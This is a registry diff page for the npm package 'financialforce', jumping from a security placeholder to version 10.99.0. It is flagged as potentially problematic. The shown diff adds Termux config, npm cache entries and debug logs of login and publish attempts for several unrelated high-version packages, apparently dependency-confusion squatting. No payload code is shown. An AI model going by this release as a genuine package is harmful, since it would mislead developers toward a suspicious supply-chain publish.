financialforce 0.0.1-security → 10.99.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of financialforce might be problematic. Click here for more details.
- package/.config/termux/termux.properties +70 -0
- package/.npm/_cacache/content-v2/sha512/5e/2a/434b787df73e50d54fca935d3ff000c38cfa207b86e7dc2215a15b93a1044945493d06414bb3ed2fdcfc39281b9809c1164f2384333f241212fe504a50b7 +0 -0
- package/.npm/_cacache/content-v2/sha512/a6/f5/bbd2f30cd8cb6658ec60fb59486afe525d438528a8d5922e3d449987b8b97ed276531aa6dce9232419ae07c3e1b43faadb201669d8bb8352fdd908dd63bd +0 -0
- package/.npm/_cacache/content-v2/sha512/ea/8b/812a09aa5e4df182845f95d0705fa19b4b68476caeaa8fc2580ef237cd4f88f6d43ea6a9d8c11df18b39846e23a1b6469d9dce56291fef1f25f38262252d +0 -0
- package/.npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea +4 -0
- package/.npm/_logs/2024-08-27T12_00_33_782Z-debug-0.log +19 -0
- package/.npm/_logs/2024-08-27T12_00_56_014Z-debug-0.log +55 -0
- package/.npm/_logs/2024-08-27T12_09_14_865Z-debug-0.log +56 -0
- package/.npm/_logs/2024-08-27T12_41_38_386Z-debug-0.log +75 -0
- package/.npm/_logs/2024-08-27T12_44_10_797Z-debug-0.log +71 -0
- package/.npm/_logs/2024-08-27T12_53_34_611Z-debug-0.log +13 -0
- package/index.js +3 -0
- package/package.json +18 -3
- package/README.md +0 -5
@@ -0,0 +1,70 @@
|
|
1
|
+
### This is a `.properties` [https://en.wikipedia.org/wiki/.properties] file
|
2
|
+
### for termux app properties and is loaded with the `java.util.Properties.load()`
|
3
|
+
### [https://developer.android.com/reference/java/util/Properties#load(java.io.Reader)]
|
4
|
+
### call by the termux app and must be formatted as per its spec.
|
5
|
+
### To make changes to a property value, uncomment the property line by removing
|
6
|
+
### any hash `#` characters at the start of the line.
|
7
|
+
### After making required changes, save the file and run `termux-reload-settings`
|
8
|
+
### in the terminal for changes to take effect. Some properties require app
|
9
|
+
### process to be restarted to be updated which can be done by force stopping
|
10
|
+
### the app from Android app settings.
|
11
|
+
### All information here can also be found on the
|
12
|
+
### wiki: https://wiki.termux.com/wiki/Terminal_Settings
|
13
|
+
|
14
|
+
###############
|
15
|
+
# Extra keys
|
16
|
+
###############
|
17
|
+
|
18
|
+
### Settings for choosing which set of symbols to use for illustrating keys.
|
19
|
+
### Choose between default, arrows-only, arrows-all, all and none
|
20
|
+
# extra-keys-style = default
|
21
|
+
|
22
|
+
### Force capitalize all text in extra keys row button labels.
|
23
|
+
# extra-keys-text-all-caps = true
|
24
|
+
|
25
|
+
### Default extra-key configuration
|
26
|
+
# extra-keys = [[ESC, TAB, CTRL, ALT, {key: '-', popup: '|'}, DOWN, UP]]
|
27
|
+
|
28
|
+
### Two rows with more keys
|
29
|
+
# extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'], \
|
30
|
+
# ['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]
|
31
|
+
|
32
|
+
### Configuration with additional popup keys (swipe up from an extra key)
|
33
|
+
# extra-keys = [[ \
|
34
|
+
# {key: ESC, popup: {macro: "CTRL f d", display: "tmux exit"}}, \
|
35
|
+
# {key: CTRL, popup: {macro: "CTRL f BKSP", display: "tmux ←"}}, \
|
36
|
+
# {key: ALT, popup: {macro: "CTRL f TAB", display: "tmux →"}}, \
|
37
|
+
# {key: TAB, popup: {macro: "ALT a", display: A-a}}, \
|
38
|
+
# {key: LEFT, popup: HOME}, \
|
39
|
+
# {key: DOWN, popup: PGDN}, \
|
40
|
+
# {key: UP, popup: PGUP}, \
|
41
|
+
# {key: RIGHT, popup: END}, \
|
42
|
+
# {macro: "ALT j", display: A-j, popup: {macro: "ALT g", display: A-g}}, \
|
43
|
+
# {key: KEYBOARD, popup: {macro: "CTRL d", display: exit}} \
|
44
|
+
# ]]
|
45
|
+
|
46
|
+
### Another configuration with advanced popup key usage designed for more
|
47
|
+
### specific use-cases. In this case, it is designed for working with Vim-like
|
48
|
+
### editors for faster navigation
|
49
|
+
#extra-keys = [ \
|
50
|
+
# [ \
|
51
|
+
# { key: ESC, popup: { macro: ":q\n", display: "QuickExit" } }, \
|
52
|
+
# { key: '/', popup: '\\\\' }, \
|
53
|
+
# { key: '-', popup: '_' }, \
|
54
|
+
# { key: HOME, popup: { macro: "CTRL HOME", display: "Top" } }, \
|
55
|
+
# { key: UP, popup: { macro: "CTRL UP", display: "UP" } }, \
|
56
|
+
# { key: END, popup: { macro: "CTRL END", display: "End" } }, \
|
57
|
+
# { key: ":", popup: ";" }, \
|
58
|
+
# { key: "(", popup: "{" } \
|
59
|
+
# ], \
|
60
|
+
# [ \
|
61
|
+
# { key: TAB, popup: { macro: ":wq\n", display: "Write And Exit" } }, \
|
62
|
+
# { key: CTRL, popup: { macro: ":w\n", display: "Write" } }, \
|
63
|
+
# ALT, \
|
64
|
+
# { key: LEFT, popup: { macro: "CTRL LEFT", display: "Left" } }, \
|
65
|
+
# { key: DOWN, popup: { macro: "CTRL DOWN", display: "Bottom" } }, \
|
66
|
+
# { key: RIGHT, popup: { macro: "CTRL RIGHT", display: "Right" } }, \
|
67
|
+
# { key: "#", popup: "$" }, \
|
68
|
+
# { key: ")", popup: "}" } \
|
69
|
+
# ] \
|
70
|
+
#]
|
package/.npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea
ADDED
@@ -0,0 +1,4 @@
|
|
1
|
+
|
2
|
+
baf31ebbc1278058030fae9ab24d53510e4363de {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-pvW70vMM2MtmWOxg+1lIav5SXUOFKKjVki49RJmHuLl+0nZTGqbc6SMkGa4Hw+G0P6rbIBZp2LuDUv3ZCN1jvQ==","time":1724760556737,"size":2839}
|
3
|
+
0bad5a32a97a60c6f1b8a2fc30ee5b0bf3344af4 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-XipDS3h99z5Q1U/Kk10/8ADDjPoge4bn3CIVoVuToQRJRUk9BkFLs+0v3Pw5KBuYCcEWTyOEMz8kEhL+UEpQtw==","time":1724762499609,"size":7071}
|
4
|
+
bceeb910f584cef866fe52e3892df218824abab1 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-6ouBKgmqXk3xgoRfldBwX6GbS2hHbK6qj8JYDvI3zU+I9tQ+pqnYwR3xizmEbiOhtkadnc5WKR/vHyXzgmIlLQ==","time":1724762651915,"size":15565}
|
@@ -0,0 +1,19 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
7
|
+
6 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
8
|
+
7 verbose title npm config set foreground-scripts true
|
9
|
+
8 verbose argv "config" "set" "foreground-scripts" "true"
|
10
|
+
9 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_00_33_782Z-
|
11
|
+
10 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_00_33_782Z-debug-0.log
|
12
|
+
11 info config set "foreground-scripts" "true"
|
13
|
+
12 silly logfile done cleaning log files
|
14
|
+
13 verbose cwd /
|
15
|
+
14 verbose os Linux 4.19.157-perf+
|
16
|
+
15 verbose node v22.5.1
|
17
|
+
16 verbose npm v10.8.2
|
18
|
+
17 verbose exit 0
|
19
|
+
18 info ok
|
@@ -0,0 +1,55 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm login
|
8
|
+
7 verbose argv "login"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_00_56_014Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_00_56_014Z-debug-0.log
|
11
|
+
10 notice Log in on https://registry.npmjs.org/
|
12
|
+
11 verbose web login before first POST
|
13
|
+
12 silly logfile done cleaning log files
|
14
|
+
13 http fetch POST 200 https://registry.npmjs.org/-/v1/login 608ms
|
15
|
+
14 verbose web auth got response {
|
16
|
+
14 verbose web auth loginUrl: 'https://www.npmjs.com/login?next=/login/cli/0b003fc1-e6a8-444d-9402-c69f3969a6fb',
|
17
|
+
14 verbose web auth doneUrl: 'https://registry.npmjs.org/-/v1/done?sessionId=0b003fc1-e6a8-444d-9402-c69f3969a6fb'
|
18
|
+
14 verbose web auth }
|
19
|
+
15 verbose web auth opening url pair
|
20
|
+
16 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 341ms
|
21
|
+
17 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 373ms
|
22
|
+
18 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 281ms
|
23
|
+
19 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 296ms
|
24
|
+
20 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 267ms
|
25
|
+
21 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 304ms
|
26
|
+
22 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 404ms
|
27
|
+
23 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 315ms
|
28
|
+
24 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 324ms
|
29
|
+
25 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 378ms
|
30
|
+
26 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 288ms
|
31
|
+
27 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 490ms
|
32
|
+
28 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 346ms
|
33
|
+
29 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 387ms
|
34
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 374ms
|
35
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 381ms
|
36
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 375ms
|
37
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 471ms
|
38
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 374ms
|
39
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 378ms
|
40
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 375ms
|
41
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 370ms
|
42
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 306ms
|
43
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 422ms
|
44
|
+
40 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 400ms
|
45
|
+
41 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 299ms
|
46
|
+
42 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 360ms
|
47
|
+
43 http fetch GET 200 https://registry.npmjs.org/-/v1/done?sessionId=*** 388ms
|
48
|
+
44 verbose web auth done-check finished
|
49
|
+
45 info login Logged in on https://registry.npmjs.org/.
|
50
|
+
46 verbose cwd /data/data/com.termux/files/home
|
51
|
+
47 verbose os Linux 4.19.157-perf+
|
52
|
+
48 verbose node v22.5.1
|
53
|
+
49 verbose npm v10.8.2
|
54
|
+
50 verbose exit 0
|
55
|
+
51 info ok
|
@@ -0,0 +1,56 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_09_14_865Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_09_14_865Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
14
|
+
13 notice
|
15
|
+
14 notice 📦 asanablog@1.999.0
|
16
|
+
15 notice Tarball Contents
|
17
|
+
16 notice 3.1kB .config/termux/termux.properties
|
18
|
+
16 notice 926B .npm/_logs/2024-08-27T12_00_33_782Z-debug-0.log
|
19
|
+
16 notice 3.6kB .npm/_logs/2024-08-27T12_00_56_014Z-debug-0.log
|
20
|
+
16 notice 764B .npm/_logs/2024-08-27T12_09_14_865Z-debug-0.log
|
21
|
+
16 notice 375B index.js
|
22
|
+
16 notice 316B package.json
|
23
|
+
17 notice Tarball Details
|
24
|
+
18 notice name: asanablog
|
25
|
+
19 notice version: 1.999.0
|
26
|
+
20 notice filename: asanablog-1.999.0.tgz
|
27
|
+
21 notice package size: 2.8 kB
|
28
|
+
22 notice unpacked size: 9.1 kB
|
29
|
+
23 notice shasum: 1cb24b5d306d71299365c3ac3fee335722ae8ff6
|
30
|
+
24 notice integrity: sha512-pvW70vMM2MtmW[...]LuDUv3ZCN1jvQ==
|
31
|
+
25 notice total files: 6
|
32
|
+
26 notice
|
33
|
+
27 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
|
34
|
+
28 http fetch PUT 401 https://registry.npmjs.org/asanablog 804ms
|
35
|
+
29 verbose web auth opening url pair
|
36
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 320ms
|
37
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 728ms
|
38
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 357ms
|
39
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 335ms
|
40
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 420ms
|
41
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 386ms
|
42
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 462ms
|
43
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 395ms
|
44
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 446ms
|
45
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 450ms
|
46
|
+
40 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 372ms
|
47
|
+
41 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 300ms
|
48
|
+
42 http fetch GET 200 https://registry.npmjs.org/-/v1/done?authId=*** 450ms
|
49
|
+
43 verbose web auth done-check finished
|
50
|
+
44 http fetch PUT 200 https://registry.npmjs.org/asanablog 2673ms
|
51
|
+
45 verbose cwd /data/data/com.termux/files/home
|
52
|
+
46 verbose os Linux 4.19.157-perf+
|
53
|
+
47 verbose node v22.5.1
|
54
|
+
48 verbose npm v10.8.2
|
55
|
+
49 verbose exit 0
|
56
|
+
50 info ok
|
@@ -0,0 +1,75 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_41_38_386Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_41_38_386Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
14
|
+
13 notice
|
15
|
+
14 notice 📦 generator-toytool@10.99.0
|
16
|
+
15 notice Tarball Contents
|
17
|
+
16 notice 3.1kB .config/termux/termux.properties
|
18
|
+
16 notice 2.8kB .npm/_cacache/content-v2/sha512/a6/f5/bbd2f30cd8cb6658ec60fb59486afe525d438528a8d5922e3d449987b8b97ed276531aa6dce9232419ae07c3e1b43faadb201669d8bb8352fdd908dd63bd
|
19
|
+
16 notice 247B .npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea
|
20
|
+
16 notice 926B .npm/_logs/2024-08-27T12_00_33_782Z-debug-0.log
|
21
|
+
16 notice 3.6kB .npm/_logs/2024-08-27T12_00_56_014Z-debug-0.log
|
22
|
+
16 notice 2.9kB .npm/_logs/2024-08-27T12_09_14_865Z-debug-0.log
|
23
|
+
16 notice 764B .npm/_logs/2024-08-27T12_41_38_386Z-debug-0.log
|
24
|
+
16 notice 92B index.js
|
25
|
+
16 notice 650B package.json
|
26
|
+
17 notice Tarball Details
|
27
|
+
18 notice name: generator-toytool
|
28
|
+
19 notice version: 10.99.0
|
29
|
+
20 notice filename: generator-toytool-10.99.0.tgz
|
30
|
+
21 notice package size: 7.1 kB
|
31
|
+
22 notice unpacked size: 15.1 kB
|
32
|
+
23 notice shasum: 9fc50f90fc888213eb2034f586c0c564c9c3e9aa
|
33
|
+
24 notice integrity: sha512-XipDS3h99z5Q1[...]z8kEhL+UEpQtw==
|
34
|
+
25 notice total files: 9
|
35
|
+
26 notice
|
36
|
+
27 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
|
37
|
+
28 http fetch PUT 401 https://registry.npmjs.org/generator-toytool 587ms
|
38
|
+
29 verbose web auth opening url pair
|
39
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 286ms
|
40
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 304ms
|
41
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 390ms
|
42
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 301ms
|
43
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 345ms
|
44
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 374ms
|
45
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 380ms
|
46
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 391ms
|
47
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 354ms
|
48
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 374ms
|
49
|
+
40 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 377ms
|
50
|
+
41 http fetch GET 200 https://registry.npmjs.org/-/v1/done?authId=*** 371ms
|
51
|
+
42 verbose web auth done-check finished
|
52
|
+
43 http fetch PUT 403 https://registry.npmjs.org/generator-toytool 824ms
|
53
|
+
44 verbose stack HttpErrorGeneral: 403 Forbidden - PUT https://registry.npmjs.org/generator-toytool - You do not have permission to publish "generator-toytool". Are you logged in as the correct user?
|
54
|
+
44 verbose stack at /data/data/com.termux/files/usr/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/check-response.js:95:15
|
55
|
+
44 verbose stack at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
|
56
|
+
44 verbose stack at async publish (/data/data/com.termux/files/usr/lib/node_modules/npm/node_modules/libnpmpublish/lib/publish.js:53:15)
|
57
|
+
44 verbose stack at async otplease (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/utils/auth.js:22:14)
|
58
|
+
44 verbose stack at async #publish (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/commands/publish.js:157:7)
|
59
|
+
44 verbose stack at async Publish.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/commands/publish.js:46:5)
|
60
|
+
44 verbose stack at async Npm.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:207:9)
|
61
|
+
44 verbose stack at async module.exports (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/cli/entry.js:67:5)
|
62
|
+
45 verbose statusCode 403
|
63
|
+
46 verbose pkgid generator-toytool@10.99.0
|
64
|
+
47 error code E403
|
65
|
+
48 error 403 403 Forbidden - PUT https://registry.npmjs.org/generator-toytool - You do not have permission to publish "generator-toytool". Are you logged in as the correct user?
|
66
|
+
49 error 403 In most cases, you or one of your dependencies are requesting
|
67
|
+
49 error 403 a package version that is forbidden by your security policy, or
|
68
|
+
49 error 403 on a server you do not have access to.
|
69
|
+
50 verbose cwd /data/data/com.termux/files/home
|
70
|
+
51 verbose os Linux 4.19.157-perf+
|
71
|
+
52 verbose node v22.5.1
|
72
|
+
53 verbose npm v10.8.2
|
73
|
+
54 verbose exit 1
|
74
|
+
55 verbose code 1
|
75
|
+
56 error A complete log of this run can be found in: /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_41_38_386Z-debug-0.log
|
@@ -0,0 +1,71 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_44_10_797Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_44_10_797Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
14
|
+
13 notice
|
15
|
+
14 notice 📦 MC5-Adidas@10.99.0
|
16
|
+
15 notice Tarball Contents
|
17
|
+
16 notice 3.1kB .config/termux/termux.properties
|
18
|
+
16 notice 7.1kB .npm/_cacache/content-v2/sha512/5e/2a/434b787df73e50d54fca935d3ff000c38cfa207b86e7dc2215a15b93a1044945493d06414bb3ed2fdcfc39281b9809c1164f2384333f241212fe504a50b7
|
19
|
+
16 notice 2.8kB .npm/_cacache/content-v2/sha512/a6/f5/bbd2f30cd8cb6658ec60fb59486afe525d438528a8d5922e3d449987b8b97ed276531aa6dce9232419ae07c3e1b43faadb201669d8bb8352fdd908dd63bd
|
20
|
+
16 notice 494B .npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea
|
21
|
+
16 notice 926B .npm/_logs/2024-08-27T12_00_33_782Z-debug-0.log
|
22
|
+
16 notice 3.6kB .npm/_logs/2024-08-27T12_00_56_014Z-debug-0.log
|
23
|
+
16 notice 2.9kB .npm/_logs/2024-08-27T12_09_14_865Z-debug-0.log
|
24
|
+
16 notice 5.0kB .npm/_logs/2024-08-27T12_41_38_386Z-debug-0.log
|
25
|
+
16 notice 764B .npm/_logs/2024-08-27T12_44_10_797Z-debug-0.log
|
26
|
+
16 notice 92B index.js
|
27
|
+
16 notice 643B package.json
|
28
|
+
17 notice Tarball Details
|
29
|
+
18 notice name: MC5-Adidas
|
30
|
+
19 notice version: 10.99.0
|
31
|
+
20 notice filename: MC5-Adidas-10.99.0.tgz
|
32
|
+
21 notice package size: 15.6 kB
|
33
|
+
22 notice unpacked size: 27.5 kB
|
34
|
+
23 notice shasum: cd9966c324b45dce576df88b5b3c67e8da149800
|
35
|
+
24 notice integrity: sha512-6ouBKgmqXk3xg[...]R/vHyXzgmIlLQ==
|
36
|
+
25 notice total files: 11
|
37
|
+
26 notice
|
38
|
+
27 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
|
39
|
+
28 http fetch PUT 401 https://registry.npmjs.org/MC5-Adidas 830ms
|
40
|
+
29 verbose web auth opening url pair
|
41
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 285ms
|
42
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 286ms
|
43
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 443ms
|
44
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 376ms
|
45
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 568ms
|
46
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 584ms
|
47
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 303ms
|
48
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 351ms
|
49
|
+
38 http fetch GET 200 https://registry.npmjs.org/-/v1/done?authId=*** 461ms
|
50
|
+
39 verbose web auth done-check finished
|
51
|
+
40 http fetch PUT 400 https://registry.npmjs.org/MC5-Adidas 905ms
|
52
|
+
41 verbose stack HttpErrorGeneral: 400 Bad Request - PUT https://registry.npmjs.org/MC5-Adidas - "MC5-Adidas" is invalid for new packages
|
53
|
+
41 verbose stack at /data/data/com.termux/files/usr/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/check-response.js:95:15
|
54
|
+
41 verbose stack at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
|
55
|
+
41 verbose stack at async publish (/data/data/com.termux/files/usr/lib/node_modules/npm/node_modules/libnpmpublish/lib/publish.js:53:15)
|
56
|
+
41 verbose stack at async otplease (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/utils/auth.js:22:14)
|
57
|
+
41 verbose stack at async #publish (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/commands/publish.js:157:7)
|
58
|
+
41 verbose stack at async Publish.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/commands/publish.js:46:5)
|
59
|
+
41 verbose stack at async Npm.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:207:9)
|
60
|
+
41 verbose stack at async module.exports (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/cli/entry.js:67:5)
|
61
|
+
42 verbose statusCode 400
|
62
|
+
43 verbose pkgid MC5-Adidas@10.99.0
|
63
|
+
44 error code E400
|
64
|
+
45 error 400 Bad Request - PUT https://registry.npmjs.org/MC5-Adidas - "MC5-Adidas" is invalid for new packages
|
65
|
+
46 verbose cwd /data/data/com.termux/files/home
|
66
|
+
47 verbose os Linux 4.19.157-perf+
|
67
|
+
48 verbose node v22.5.1
|
68
|
+
49 verbose npm v10.8.2
|
69
|
+
50 verbose exit 1
|
70
|
+
51 verbose code 1
|
71
|
+
52 error A complete log of this run can be found in: /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_44_10_797Z-debug-0.log
|
@@ -0,0 +1,13 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_53_34_611Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T12_53_34_611Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
package/index.js
ADDED
package/package.json
CHANGED
@@ -1,6 +1,21 @@
|
|
1
1
|
{
|
2
2
|
"name": "financialforce",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "10.99.0",
|
4
|
+
